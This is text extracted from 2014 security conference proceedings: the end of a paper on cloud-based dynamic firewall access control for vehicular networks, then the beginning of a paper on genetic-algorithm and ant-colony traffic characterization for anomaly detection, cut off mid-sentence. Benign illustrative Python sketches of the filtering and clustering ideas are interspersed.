The virtual computing environment allows us to create a service-oriented network of virtual devices for applications. Any vehicle involved in the information exchange has its own virtual "avatar" in the cloud environment. This virtual "avatar" of the car holds all the information from the real object as well as the data obtained from other "avatars" in the virtual environment. Information exchange and the required calculations are done in the secure virtual environment.
Localization of computing and data collected can accelerate
the process of information processing and decision making. After that, the data are transmitted to the driver in the car for a final decision.
IV. DYNAMIC ACCESS POLICY USING FIREWALL FILTERING RULES
The implementation of vehicular network security is far from simple due to the dynamic nature of the network environment and user activity [7][8][9].
Figure 2. Security conveyor architecture.
Specific threats to the vehicular network are attacks affecting data integrity and the availability of the car systems. An attacker often prefers not to steal information from the car but to modify it, thus tricking the various systems of the vehicle. An attack on availability can significantly hamper the operation of the car, cutting off some of its devices from the information exchange process.
This specificity requires the use of specialized protective equipment. The main threat is that, while attacking the integrity of the information, the attacker can spoof the signals from the remote control, for example, acting as the owner, and steal the vehicle.
In a vehicular network, every second hundreds of users and telematics devices establish new virtual connections [10] with distant resources and services. According to the mandatory security policy, if we have N users and M resources, and these numbers are big, then we have to create a huge N*M access matrix. Each element of this matrix will be a vector of parameters and attributes describing one virtual connection. Vehicles and resources can, of course, be grouped according to their rights and context, but in either case such a matrix is too big to be processed efficiently in real time.
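The scale argument above can be illustrated with a small back-of-the-envelope sketch (the population sizes and group sizes below are illustrative assumptions, not figures from the paper):

```python
# Illustrative estimate: why a per-connection N*M access matrix becomes
# infeasible, and how grouping users and resources by rights/context
# shrinks it. All numbers here are hypothetical.

def matrix_entries(n_users: int, m_resources: int) -> int:
    """Cells in a full N x M access matrix (one attribute vector per cell)."""
    return n_users * m_resources

def grouped_entries(n_users: int, m_resources: int,
                    user_group_size: int, resource_group_size: int) -> int:
    """Cells when users and resources are grouped by rights and context."""
    user_groups = -(-n_users // user_group_size)          # ceiling division
    resource_groups = -(-m_resources // resource_group_size)
    return user_groups * resource_groups

full = matrix_entries(100_000, 50_000)                    # 5 * 10**9 cells
grouped = grouped_entries(100_000, 50_000, 1_000, 500)    # only 10_000 cells
```

Even with generous grouping, the full matrix is five orders of magnitude larger, which is why the paper turns to a staged filtering architecture instead.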
We propose a security conveyor architecture (see Figure 2), which consists of several filtering stages. At the first stage, when a connection is established, a classical static packet filter rejects known harmful traffic addressed to the local telematics devices of the car. The second stage enforces the more accurate, dynamic aspect of the access policy. In doing so, the dynamic firewall has to take into account that network resources can change their context at any moment without informing our security conveyor. That is why we propose to use prior information about remote users and resources in the firewall to enforce the security policy. Such information should be received from databases and services outside of our security monitor.
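The two-stage conveyor can be sketched as follows. This is a minimal illustration of the idea, not the paper's implementation: the blocklist entries, packet fields, and the `context` dictionary (standing in for the external databases and services) are all hypothetical.

```python
# Sketch of the two-stage "security conveyor": a static packet filter first,
# then a dynamic stage consulting external context about remote peers.

STATIC_BLOCKLIST = {("10.0.0.66", 23)}   # known-bad (source IP, dest port) pairs

def static_filter(packet: dict) -> bool:
    """Stage 1: classical static packet filtering on header fields."""
    return (packet["src"], packet["dst_port"]) not in STATIC_BLOCKLIST

def dynamic_filter(packet: dict, context: dict) -> bool:
    """Stage 2: dynamic policy; `context` stands in for the outside
    databases describing the current rights of remote users/resources."""
    role = context.get(packet["src"], "unknown")
    return role in ("owner", "telematics")

def conveyor(packet: dict, context: dict) -> bool:
    """A packet passes only if both stages accept it."""
    return static_filter(packet) and dynamic_filter(packet, context)
```

The static stage is cheap and context-free; the dynamic stage is where externally supplied, possibly stale, context is applied, which is why the paper stresses refreshing it from outside the security monitor.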
2) Storage of virtual machines and user data;
3) Cluster controller;
4) Cloud controller.
The distributed computing environment intended for solving scientific and engineering problems is a set of various
computing resources, such as virtual machines, and has the
following features [12]:
Figure 3. Dynamic access control approach.
In computer networks, information is transmitted in the form of packets. Each packet carries some part of a message. All network devices, such as vehicular transmitters and firewalls, have to operate on these packets. According to Figure 3, every access rule can be considered as one or more informational virtual connections (1) specifying an action such as "access", "read", "write", and so on. Then, we have to determine what this record means to the telematics devices and how the vehicle and the requested information resource can be described. To answer these questions, our security monitor has to use prior outside information from specialized databases and services (2). Using such information, we derive one or more Technological Virtual Connections (TVCs) from the initial informational virtual connections [10]. Then, all these TVC rules are transformed into requirements for the packet filter. At this stage, we use the state machines of different transport protocols to obtain information about packet sequences (3). If all these procedures are applied to each established virtual connection, we will receive a huge amount of filtering rules. That is why, at the next stage, we propose to optimize the set of filtering rules using a specialized algebra of filtering rules (4) [11]. Only an optimized set of filtering rules can be processed in real time by the firewall to enforce the access policy (5).
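One elementary optimization of this kind is removing shadowed rules, i.e., rules fully covered by an earlier rule and therefore unreachable. The sketch below is an illustrative stand-in for one operation of the filtering-rule algebra of [11], not its actual method; the rule format (source prefix, port range, action) is a simplifying assumption.

```python
# Removing shadowed filtering rules: a later rule fully covered by an
# earlier rule can never fire, so it can be dropped from the rule set.

def covers(a, b) -> bool:
    """Rule format: (src_prefix, (port_lo, port_hi), action).
    `a` covers `b` if every packet matched by b is also matched by a."""
    return (b[0].startswith(a[0])
            and a[1][0] <= b[1][0] and b[1][1] <= a[1][1])

def remove_shadowed(rules):
    """Keep a rule only if no earlier kept rule already covers it."""
    kept = []
    for rule in rules:
        if not any(covers(k, rule) for k in kept):
            kept.append(rule)
    return kept

rules = [("10.0.",    (1, 65535), "deny"),
         ("10.0.1.",  (80, 80),   "deny"),    # shadowed by the first rule
         ("192.168.", (443, 443), "allow")]
optimized = remove_shadowed(rules)            # the shadowed rule is dropped
```

Real rule algebras also handle partial overlaps, rule reordering, and conflicting actions; shadow elimination is just the simplest case of shrinking the rule set before it reaches the packet filter.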
1) The environment is used by a wide range of users, who are solving problems of different classes;
2) Virtual machines of different user groups can operate within one hypervisor;
3) A wide range of software components (Computer-Aided Design (CAD)/Computer-Aided Engineering (CAE) applications, development tools) and operating systems is used;
4) Different hardware configurations are used, including virtual multicore computing machines and virtual machines that allow performing computations using the Compute Unified Device Architecture (CUDA) streaming technology.
A virtualization node is the hypervisor software that runs on a powerful multicore computing node. Within the virtualization layer, domain level 0 (dom0 in terms of the XEN hypervisor, or the service console in terms of other hypervisors) and the virtual computing machines (domain level U, domU) operate.
For information security and Access Control (AC) between the virtual machines that operate under a single hypervisor, both the internal ("virtual") traffic and the external traffic (incoming from other hypervisors and from public networks) must be controlled. The access control problem can be solved by integrating a virtual firewall into the hypervisor; this firewall functions under the hypervisor, but separately from the user virtual machines. The virtual firewall domain can be defined as the "security domain" (domS). Invisible traffic filtering is an important aspect of network monitoring; the firewall must not change the topology of the hypervisor network subsystem. This can be achieved by using "Stealth" technology [12], a packet traffic control invisible to other network components.
V. ARCHITECTURE OF A SECURE CLOUD COMPUTING ENVIRONMENT
During our research at the Telematics Department of SPbSPU, we proposed an architecture for a secure cloud computing environment. This architecture takes into account the dynamic nature of the cloud environment and is suitable for describing vehicular networks.
A distributed computing environment (cloud system) consists of the following software and hardware components:
1) Virtualization nodes;
Figure 4. Secure cloud architecture.
Figure 4 shows the common architecture of a distributed cloud system with integrated AC components. The following abbreviations are used: hardware FireWall (FW); Virtual FireWall (VFW); the Central Control System of all Firewalls in the cloud (FSCS); Virtual Machine (VM); CLoud Controller (ClC); Cluster Controller (CC); Storage Controller (SC).
The FSCS distributes the access control policies to all firewalls in the system. When the information security policy changes, new access rules are replicated to all components. The security domain isolates virtual machines from the hypervisor, which prevents attacks against the hypervisor from inside the cloud. The hardware firewall isolates the private cloud components from external threats.
The joint use of hardware and software firewalls and an intrusion detection system based on predicting the driver's and vehicle's behavior and the vehicular network state will reduce the risks of intrusion into a car network. Using a virtual machine "avatar" in a cloud computing environment allows better control of the information exchange processes and the current status of all road users.
The task of finding an optimal allocation of virtual machines that minimizes the number of nodes used by the cloud system is similar to the N-dimensional Bin Packing Problem, where N corresponds to the number of selected virtual machine characteristics taken into account in the allocation. In [13], specialists of our department proposed a new approach to virtual machine distribution. A new virtual machine scheduler is able to place a virtual machine on the optimal compute node and migrate it to another node if its resource consumption state has changed. The algorithm proposed in [13] makes it possible to optimize the structure of a high-performance computing cloud system, facilitates the localization of data and computing resources, and reduces the time required to provide the services a user requests.
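A classical heuristic for this family of bin-packing problems is first-fit decreasing. The sketch below shows it in one dimension (a single CPU demand per VM) as an illustration of the packing formulation; the paper's scheduler in [13] works over N dimensions and with migration, which this sketch does not attempt.

```python
# First-fit-decreasing placement of VMs onto identical-capacity nodes,
# a one-dimensional sketch of the bin-packing view of VM allocation.

def first_fit_decreasing(vm_demands: dict, node_capacity: float):
    """Place each VM (by resource demand) on the first node with room,
    trying the largest VMs first; open a new node when none fits."""
    free = []          # residual capacity per opened node
    placement = {}     # vm name -> node index
    for vm, demand in sorted(vm_demands.items(), key=lambda kv: -kv[1]):
        for i, room in enumerate(free):
            if demand <= room:
                free[i] -= demand
                placement[vm] = i
                break
        else:
            free.append(node_capacity - demand)
            placement[vm] = len(free) - 1
    return placement, len(free)

placement, n_nodes = first_fit_decreasing(
    {"a": 6, "b": 5, "c": 4, "d": 3, "e": 2}, node_capacity=10)
```

Sorting by decreasing demand is what distinguishes this from plain first-fit and typically yields noticeably fewer nodes.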
The cloud can improve system performance through the use of parallelization technology. When a large multi-node cluster needs to access large amounts of data, task scheduling becomes a challenge. Apache Hadoop is a cluster computing framework for distributed data analytics. However, the performance of each job depends on the characteristics of the underlying cluster, and mapping tasks onto Central Processing Unit (CPU) cores and Graphics Processing Unit (GPU) devices presents significant challenges. Spark provides interesting advantages over the typical Hadoop platform [14]. Spark is an open source cluster computing system that provides primitives for in-memory cluster computing. A job can load data into memory and query it repeatedly much more quickly than with disk-based systems. To make programming faster, Spark integrates with the Scala language. Scala is a statically typed high-level programming language designed to express common programming patterns in a concise, elegant, and type-safe way. Scala runs on the Java Virtual Machine (JVM) and integrates features of object-oriented and functional languages. Spark is built around distributed datasets that support two types of parallel operations: transformations, which are lazy and yield another distributed dataset (e.g., map, filter, and join), and actions, which force the computation of a dataset and return a result (e.g., count) [15]. In our work, we propose to use Deep Content Inspection (DCI), which reconstructs, decompresses, and decodes network traffic packets into their constituent application-level objects. DCI examines the entire object and detects any malicious or non-compliant intent.
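The transformation/action split described above can be mimicked with plain Python generators, which are likewise lazy until something consumes them. This is only an analogy to the Spark model (no cluster, no actual Spark API), but it shows why transformations cost nothing until an action forces evaluation:

```python
# Lazy "transformations" vs. an eager "action", in the spirit of the
# Spark model: map/filter build a pipeline, count forces the computation.

data = range(1, 1_000_001)

# Transformations: nothing is computed yet, only a pipeline is described.
squared = (x * x for x in data)                    # "map"
even_squares = (x for x in squared if x % 2 == 0)  # "filter"

# Action: iterating forces the whole pipeline to run and returns a result.
count = sum(1 for _ in even_squares)               # "count"
```

In Spark the same laziness lets the scheduler fuse and distribute the pipeline across the cluster before any data moves; here it simply avoids materializing intermediate lists.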
While solving information security problems for vehicular networks, we rely on our expertise in the field of robot control, for example, during the space experiment "Kontur-2" [16]. Using DCI for network traffic monitoring enables us to provide the required level of security for on-surface robots, and traffic prioritization methods in packet processing allow us to provide the required level of Quality of Service (QoS) [17][18].
VI. CONCLUSION
Considering the vehicle as a dynamic cyber-physical object in a non-deterministic environment, we propose to use the methods of cloud services information security to solve the problem of access control to the car's telematics network.
Vehicular security devices have developed from mechanical through electromechanical and electronic to software-based systems.
From the viewpoint of information security, the vehicle can be regarded as a dynamic virtual machine in the cloud environment.
In this paper, we propose an architecture of a secure cloud
computing environment, which involves the use of static and
dynamic access control methods.
It is necessary to mention that the proposed solution doesn't solve all security problems of vehicular networks. The model described above can easily be merged with other methods of security control, for example, with encryption or obfuscation. A prototype of the proposed system is currently being developed for the Ford Motor Company at the Telematics Department of Saint-Petersburg State Polytechnical University.
ACKNOWLEDGMENT
This paper was funded by RFBR grant 13-07-12106 and was done in the framework of the project with the Ford Motor Company.
REFERENCES
[1] I. Studnia, V. Nicomette, E. Alata, Y. Deswarte, M. Kaâniche, and Y. Laarouchi, "Security of embedded automotive networks: state of the art and a research proposal," in SAFECOMP 2013 - Workshop CARS (2nd Workshop on Critical Automotive applications: Robustness & Safety) of the 32nd International Conference on Computer Safety, Reliability and Security, Toulouse, France, 2013, J. Fabre, P. Quéré, and M. Trapp, Eds. HAL, 2013. [Online]. Available: http://hal.archives-ouvertes.fr/SAFECOMP2013-CARS/hal-00848234
[2] B. Donohue, "Hacking the Modern Automobile," 2013, URL: http://blog.kaspersky.com/car-hacking/ [accessed: 2014-10-01].
[3] A. Weimerskirch, "Automotive Data Security," 2012, URL: http://www.sae.org/events/gim/presentations/2012/weimerskirch escrypt.pdf [accessed: 2014-10-01].
[4] A. L. Fradkov, Cybernetical Physics: Principles and Examples. Nauka, Saint-Petersburg, Russia, 2003, ISBN: 5-02-025028-7.
[5] J. A. Wheeler, "Information, physics, quantum: the search for links," in Proceedings of the 3rd International Symposium Foundations of Quantum Mechanics in the Light of New Technology, Kokubunji, Tokyo, Japan, August 28-31, 1989, N. B. Gakkai, Ed. Hitachi, Ltd., 1989, pp. 354-368.
[6] G. Niemeyer and J.-J. E. Slotine, "Telemanipulation with time delays," The International Journal of Robotics Research, vol. 23, no. 9, 2004, pp. 873-890. [Online]. Available: http://ijr.sagepub.com/content/23/9/873.abstract
[7] V. Zaborovsky, O. Zayats, and V. Mulukha, "Priority queueing with finite buffer size and randomized push-out mechanism," in Networks (ICN), 2010 Ninth International Conference on, April 2010, pp. 316-320.
[8] V. Zaborovsky and V. Mulukha, "Access control in a form of active queuing management in congested network environment," in Networks (ICN), 2011 Tenth International Conference on, 2011, pp. 12-17.
[9] V. Zaborovsky, A. Gorodetsky, and V. Muljukha, "Internet performance: TCP in stochastic network environment," in Evolving Internet, 2009. INTERNET '09. First International Conference on, Aug 2009, pp. 21-26.
[10] V. Zaborovsky, V. Mulukha, A. Silinenko, and S. Kupreenko, "Dynamic firewall configuration: Security system architecture and algebra of the filtering rules," in Evolving Internet, 2011. INTERNET '11. Third International Conference on, Jun 2011, pp. 40-45.
[11] V. Zaborovsky, V. Mulukha, and A. Silinenko, "Access control model and algebra of firewall rules," in WORLDCOMP'11: Proceedings of the 2011 International Conference on Security and Management (SAM2011). CSREA Press, Jul 2011, pp. 115-120.
[12] V. Zaborovsky, A. Lukashin, S. Kupreenko, and V. Mulukha, "Dynamic access control in cloud services," in Systems, Man, and Cybernetics (SMC), 2011 IEEE International Conference on, Oct 2011, pp. 1400-1404.
[13] A. Lukashin and A. Lukashin, "Resource scheduler based on multi-agent model and intelligent control system for OpenStack," in Internet of Things, Smart Spaces, and Next Generation Networks and Systems, ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy, Eds. Springer International Publishing, 2014, vol. 8638, pp. 556-566.
[14] T. Kumawat, P. K. Sharma, D. Verma, K. Joshi, and K. Vijeta, "Implementation of spark cluster technique with scala," in International Journal of Scientific and Research Publications (IJSRP), vol. 2, 2012. [Online]. Available: http://www.ijsrp.org/research-paper-1112/ijsrp-p1181.pdf [accessed: 2014-10-01]
[15] A. Lukashin, L. Laboshin, V. Zaborovsky, and V. Mulukha, "Distributed packet trace processing method for information security analysis," in Internet of Things, Smart Spaces, and Next Generation Networks and Systems, ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy, Eds. Springer International Publishing, 2014, vol. 8638, pp. 535-543.
[16] V. Zaborovsky, M. Guk, V. Muliukha, and A. Ilyashenko, "Cyber-physical approach to the network-centric robot control problems," in Internet of Things, Smart Spaces, and Next Generation Networks and Systems, ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy, Eds. Springer International Publishing, 2014, vol. 8638, pp. 619-629.
[17] A. Ilyashenko, O. Zayats, V. Muliukha, and L. Laboshin, "Further investigations of the priority queuing system with preemptive priority and randomized push-out mechanism," in Internet of Things, Smart Spaces, and Next Generation Networks and Systems, ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy, Eds. Springer International Publishing, 2014, vol. 8638, pp. 433-443.
[18] V. Muliukha, A. Ilyashenko, O. Zayats, and V. Zaborovsky, "Preemptive queueing system with randomized push-out mechanism," Communications in Nonlinear Science and Numerical Simulation, 2014, in print. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S1007570414004031
Digital Signature of Network Segment Using Genetic Algorithm and Ant Colony
Optimization Metaheuristics
Paulo R. G. Hernandes Jr.∗, Luiz F. Carvalho†, Gilberto Fernandes Jr.†, Mario Lemes Proença Jr.†
∗ Security Information Department, São Paulo State Technological College (FATEC), Ourinhos, Brazil
† Computer Science Department, State University of Londrina (UEL), Londrina, Brazil
{paulogalego, luizfcarvalhoo, gil.fernandes6}@gmail.com, proenca@uel.br
Abstract—Every day, computer networks gain more significance in our lives, and their complexity is still growing. To help customers achieve maximum productivity and avoid security risks, network administrators have to manage network resources efficiently. Traffic monitoring is an important task, which describes the network's normal behavior. Thereby, we present a Digital Signature of Network Segment using Flow Analysis (DSNSF) as a mechanism to assist network management and information security through traffic characterization. Our new approach uses a genetic algorithm to optimize the process. In order to accomplish this task, we compared the novel model with another similar method, Ant Colony Optimization for Digital Signature (ACODS), using a real data set of traffic for bits and packets. We also evaluate these models to measure their accuracy.
Keywords–Traffic Characterization; Traffic Monitoring; Network Management; Genetic Algorithm; sFlow.
I. INTRODUCTION
Network management is a complex task which utilizes different tools and techniques. These tools and techniques aim not only to help network administrators in their daily tasks, but also to provide them with mechanisms to detect security events in order to avoid security incidents.
Since the first networked computers, administrators have required all the necessary information about their equipment, so they could understand the behavior of their network by observing information such as an interface's traffic or which ports of a remote switch are being used. Thereby, management protocols and tools emerged.
The Simple Network Management Protocol (SNMP) became popular because of its simplicity and its adoption by most equipment manufacturers [1]. Using SNMP, we can monitor whether the equipment is functioning, its average traffic, and other additional information when required. Nevertheless, with the increasing complexity of applications that run on networks, such as VoIP, P2P, and video on demand, and also the growth of mobile equipment and the Internet of Things, the SNMP protocol alone could not provide all the information required by network administrators. With the use of data flows, network administrators can obtain more detailed information and make decisions more quickly and efficiently.
A flow record reports at least the endpoint addresses, time, and volume of information transferred between two sockets. This gives a better view of the traffic than interface-level counters queried by SNMP, and it provides significant data reduction compared to packet traces, allowing it to scale to large networks [2]. The study of flow records can help network administrators identify anomalies in their environments. As a result, researchers are trying to find anomaly detection models based on traffic characterization. These models, as described by Lakhina et al. [3], are able to identify anomalous behavior based on traffic history, learning the standard behavior of an environment and detecting changes in the network routine.
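A flow record of the kind described above can be sketched as a small data structure. The field names and values below are illustrative assumptions, not a specific sFlow or NetFlow layout:

```python
# Minimal sketch of a flow record: endpoints, timing, and the volume
# transferred between two sockets; from it, per-flow rates are derived.

from dataclasses import dataclass

@dataclass
class FlowRecord:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    start_time: float   # epoch seconds
    end_time: float
    byte_count: int
    packet_count: int

    def bits_per_second(self) -> float:
        """Average throughput of the flow, one of the two attributes
        (bits and packets per second) used to build the DSNSF."""
        return self.byte_count * 8 / (self.end_time - self.start_time)

rec = FlowRecord("192.168.0.10", 51234, "10.0.0.5", 80,
                 1415000000.0, 1415000012.5, 18_432, 24)
```

Aggregating such records per interval (the paper uses 5-minute bins) gives the bits-per-second and packets-per-second series that the signature models consume.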
A network anomaly detection system first creates a baseline profile of the normal system, network, or program activity. Thereafter, any activity deviating from the baseline is treated as a possible intrusion [4]. It helps administrators identify any attack or anomalous network behavior, such as users running a P2P application or any other activity that is against company policies.
To reach our target, we use a Genetic Algorithm (GA), a model which simulates the natural evolution process through operators such as selection, crossover, and mutation [5]. GA is recognized as an ideal optimization technique for solving a large variety of problems. One of the best uses for GA is to optimize search problems, or to organize data under some conditions.
Our proposal is to create a Digital Signature of Network Segment using Flow Analysis (DSNSF) utilizing GA
to optimize the clustering process and characterize network
traffic using flow analysis to permit detection of network
anomalies. We use a real set of data to perform the process
and evaluate the results to prove the accuracy of our model.
Also, we compared this technique with another approach, the
Ant Colony Optimization for Digital Signature (ACODS).
This paper is organized as follows: Section II presents the related work. Section III details the novel method DSNSF-GA and also the ACODS approach, both used to characterize network traffic. Section IV delivers the generation of the DSNSF-GA. Section V presents the results of our evaluation tests, and finally Section VI concludes this paper.
II. RELATED WORK
The target of our work is to characterize network traffic and permit network administrators to identify anomalous behavior in their environments. For this purpose, we created a DSNSF. This methodology for characterizing network traffic was proposed by Proença et al. [6], in which a Digital Signature of Network Segment (DSNS) was created using data of each day, usually a workday, based on the history of the previous weeks.
A Firefly Harmonic Clustering Algorithm (FHCA) [7], an optimized clustering algorithm based on the behavior of fireflies and their emitted light characteristics, used data acquired via SNMP. To characterize network traffic, certain techniques can be applied, such as Holt-Winters for Digital Signature (HWDS), a modification of the classic Holt-Winters statistical forecasting method [8], or the K-means for Digital Signature (KMDS) [9], where a DSNS is created using the K-means clustering technique. The ACODS approach presented by Carvalho et al. [10] is based on the Ant Colony Optimization metaheuristic. For DSNSF creation, ACODS aims to optimize the clustering process, seeking solutions that make it possible to extract patterns of network traffic.
GA was proposed by Holland [5] to simulate the natural evolution process, and it is recognized as an ideal solution for problems with a large solution space. One of the uses of GA is the optimization of the clustering process. A cluster is a group of data organized so that data within the same group are similar and data in different groups are dissimilar. A genetic algorithm-based clustering technique was proposed in [11]; it uses the Euclidean distance as the objective function to classify which cluster each point should belong to. This is an example of a profitable way to organize data among clusters using GA and clustering.
In Xiaopei et al. [12], an Artificial Immune System is used along with GA in order to optimize the process. An immune system produces plenty of antibodies to resist an antigen, an attribute very similar to the individual diversity of GA. Applying GA to this memory-identifying function can enhance the quality of the generated detectors, thereby improving the efficiency of detection. In Guo et al. [13], a network anomaly intrusion detection based on genetic clustering uses the cluster centers as binary code to organize data and detect intruders. However, if the number of clusters and the length of the chromosomes are too large, the system becomes inefficient.
III. GENERATION OF DSNSF
In this section, we present two metaheuristic strategies to create a DSNSF using data as bits and packets per second. These data were collected using sFlow to generate flows from the network's assets. Our purpose in this work is to demonstrate that the flow attributes bits and packets per second can be used to identify a normal, or expected, traffic pattern. The first model is based on the theory of natural evolution of species, implemented in computing as the Genetic Algorithm, which simulates the natural process of evolution in a population. The second uses the Ant Colony Optimization process, which is based on the behavior of ant colonies. Both methods are appropriate for DSNSF construction and are described below.
A. DSNSF-GA
Our DSNSF-GA uses a Genetic Algorithm-based approach to organize data into clusters. These data were collected using sFlow at the State University of Londrina (UEL). We use the average among cluster centroids to generate a graph that shows the network traffic in bits and packets per second using the last three corresponding days of the week, and compare it with the data of the current day to detect network anomalies. For example, for a Monday we use data from the last three Mondays (excluding the current day) to plot a graph with the characterized traffic, and compare the current day against it to detect anomalous behavior.
GA is a technique which manipulates a population of potential problem solutions, trying to optimize them. Specifically, it operates on a coded representation of solutions, equivalent to the genetic material (chromosomes) of individuals in nature. Each individual is assigned a fitness value reflecting its adaptability to an environment in comparison with others. As in nature, selection elects the fittest individuals. These are assigned for genetic combination, also called crossover, which results in the exchange of genetic material (reproduction), generating a new population.
Mutation is a modification of the value of some genes belonging to a solution, with some probability p′ (the mutation probability). The function of mutation in GA is to restore lost or unexplored genetic material in the population, preventing premature convergence to a sub-optimal solution and helping to find a better one. Selection, crossover, and mutation are repeated over several generations, for a fixed number of times or until some condition is reached. This cycle is represented in Figure 1.
Figure 1. Genetic Algorithm cycle.
To support these mechanisms, other operations must be used to complete the GA process, such as the selection engine and the crossover point selection. We must also determine our objective and fitness functions, which are the functions being optimized. In our approach, we use the Euclidean distance as both the objective and fitness function.
The number of clusters is fixed. We use the Euclidean distance to determine the distance of each point from its respective cluster center. Our chromosome is represented by real numbers, which are the values of the cluster centers.
The Euclidean distance is given by

J = \sum_{i=1}^{E} \sum_{j=1}^{K} \sqrt{\sum_{n=1}^{N} (x_{in} - c_{jn})^{2}}    (1)
in which K is the total number of clusters, E represents
the number of flows to be clustered, and N indicates the data
dimensionality, i.e., the number of features to be processed. The
collected flows are divided into five-minute intervals, totaling 288
data sets throughout the day. The variable x_{in} denotes the value
of feature n of flow i, and c_{jn} stores the value of the center of
cluster j at dimension n.
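Equation (1) translates directly into code; the sketch below assumes flows and centers are given as plain lists of N-dimensional feature vectors:

```python
from math import sqrt

def objective(flows, centers):
    """Equation (1): sum over all flows i and clusters j of the
    Euclidean distance between flow i and cluster center j."""
    return sum(sqrt(sum((x - c) ** 2 for x, c in zip(flow, center)))
               for flow in flows        # i = 1..E
               for center in centers)   # j = 1..K

# Two 2-dimensional flows and one center at the origin:
# the distances are 5.0 and 13.0, so J = 18.0.
J = objective([[3.0, 4.0], [5.0, 12.0]], [[0.0, 0.0]])
```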
We chose the Roulette Wheel approach to find the fittest
in the population, which conceptually consists of giving each
individual a slice of a circular wheel equal in area to the
individual’s fitness [14]. We spin the roulette once for each
individual in the population; those selected
more often are the fittest and will breed the new
generation.
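A minimal sketch of Roulette Wheel selection follows; it assumes non-negative fitness values (for the minimization objective in (1), one would first convert distances into fitness, e.g., by taking their inverse):

```python
import random

def roulette_select(population, fitnesses):
    """Pick one individual with probability proportional to its fitness,
    i.e., to the area of its slice of the wheel."""
    total = sum(fitnesses)
    spin = random.uniform(0, total)
    running = 0.0
    for individual, fitness in zip(population, fitnesses):
        running += fitness
        if spin <= running:
            return individual
    return population[-1]  # guard against floating-point round-off

# Spin once per individual in the population, as described in the text.
random.seed(7)
population = ["a", "b", "c", "d"]
fitnesses = [1.0, 1.0, 1.0, 7.0]   # "d" should dominate the new parents
parents = [roulette_select(population, fitnesses) for _ in population]
```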
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The crossover operator combines the chromosomes of two
parents to create a new one. In our approach, we choose
a random number to divide both chromosomes at the same
point and merge them into another one (child). This process
continues until the old population is replaced by a new
population of “children”.
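The single-point crossover described here — one random cut applied to both parents, with the pieces merged into children — can be sketched as:

```python
import random

def single_point_crossover(parent_a, parent_b):
    """Split both parent chromosomes at the same random point and
    swap the tails, producing two children."""
    point = random.randint(1, len(parent_a) - 1)   # never cut at the ends
    child1 = parent_a[:point] + parent_b[point:]
    child2 = parent_b[:point] + parent_a[point:]
    return child1, child2

random.seed(3)
c1, c2 = single_point_crossover([1, 2, 3, 4], [5, 6, 7, 8])
```

Whatever the cut point, the two children together carry exactly the genes of the two parents.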
To start the process, we generate a random initial population, to which we apply crossover, selection and
mutation. As described, our chromosomes are the
cluster centroid values. We set an initial population
of forty parents. They create the new generation, which
replaces the old one, and this is repeated for sixty
iterations. For our purpose we concluded that sixty is an ideal
number, because a higher number would increase the effort
unnecessarily, and a lower one would not produce an ideal solution.
At the end of this process, we have the best chromosome
based on its fitness function. This value represents a single
point in the DSNSF-GA. We have to apply the clustering
using GA for each point in the graph, so it is repeated
288 times, one point every five minutes.
B. ACODS - Ant Colony Optimization for Digital Signature
Nature has long inspired solutions to
human problems. Hence, a variety of biologically inspired
approaches have appeared in research fields such as
engineering, computer science, medicine and economics. For
example, the ants’ ability to find the shortest path between
their colony and a food source inspired the creation of a
very promising method, the Ant Colony Optimization (ACO)
metaheuristic [15].
Similarly to real ants, ACO agents are able to organize
themselves using pheromone trails. They travel through the
search space represented by a graph G(V, E), where V is the
finite set of nodes and E is the set of edges. Agents are
attracted to the locations that are more favorable for optimizing the objective
function, i.e., those in which the concentration of pheromone
deposited by ants that previously traveled the same
path is higher.
According to Jiang et al. [16], the group-living habits
of ant colonies are essentially similar to the grouping of
data, so algorithms based on the behavior of ants have natural
advantages in cluster analysis. Thus, we
introduce ACODS, a modification of the Ant Colony
Optimization metaheuristic for DSNSF creation using a
clustering approach.
In this paper, we assume that the edges of G are formed
between the center of a cluster (centroid) and each element
that will be clustered. ACODS runs iteratively and, in each
iteration, an agent constructs a solution. Although each ant
has the ability to build a viable solution, just as a real ant
can somehow find a path between the colony and a food source,
the highest quality solutions are obtained through cooperation
between individuals of the whole colony [17].
Algorithm 1 shows the steps executed by ACODS for
DSNSF creation. These activities fall into three categories:
Build solutions: This step consists of the concurrent and
asynchronous movement of ants through the states of the problem,
achieved by moving agents from one node to a neighboring
node in the graph structure.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Algorithm 1 – ACODS used for DSNSF creation
Require: Set of bits and packets, number of clusters
Ensure: X: vector representing the normal behavior for the bits and packet sets of a day, arranged in 288 five-minute intervals, i.e., the DSNSF
1: for i = 1 to 288 do
2:    for t = 1 to number of iterations do
3:       Create solution
4:       Evaluate solutions through the objective function (1)
5:       Update the pheromone trail
6:    end for
7:    Calculate the center of each cluster of the best solution found
8:    Xi ← average among the clusters
9: end for
10: return X
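Algorithm 1 can be mirrored as a skeleton; the solution-construction, evaluation and pheromone routines below are placeholders passed in as functions, since the paper does not spell them out:

```python
def acods_dsnsf(day_data, build_solution, evaluate, update_pheromone,
                centers_of, iterations=60):
    """Skeleton of Algorithm 1: for each of the 288 five-minute intervals,
    run the colony for a fixed number of iterations, then average the
    cluster centers of the best solution found (X_i)."""
    dsnsf = []
    for interval in day_data:                  # i = 1..288
        best, best_cost = None, float("inf")
        for _ in range(iterations):            # t = 1..T
            solution = build_solution(interval)
            cost = evaluate(solution)          # objective function (1)
            update_pheromone(solution, cost)
            if cost < best_cost:
                best, best_cost = solution, cost
        centers = centers_of(best)             # scalar centers in this toy
        dsnsf.append(sum(centers) / len(centers))
    return dsnsf

# Trivial placeholders: one "solution" per interval whose three centers
# are the interval's min, mean, and max.
day = [[1.0, 2.0, 3.0], [10.0, 20.0, 30.0]]
X = acods_dsnsf(
    day,
    build_solution=lambda interval: interval,
    evaluate=lambda s: 0.0,
    update_pheromone=lambda s, c: None,
    centers_of=lambda s: [min(s), sum(s) / len(s), max(s)],
)
```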
Local Search: This step tests and evaluates the solutions created
by the ants through a local search. In our model, we use the
objective function to measure how good the solutions built
by the ants are.
Pheromone Update: The pheromone trails are modified in
this process. The trail values can be incremented (when ants
deposit pheromone on the edges between the
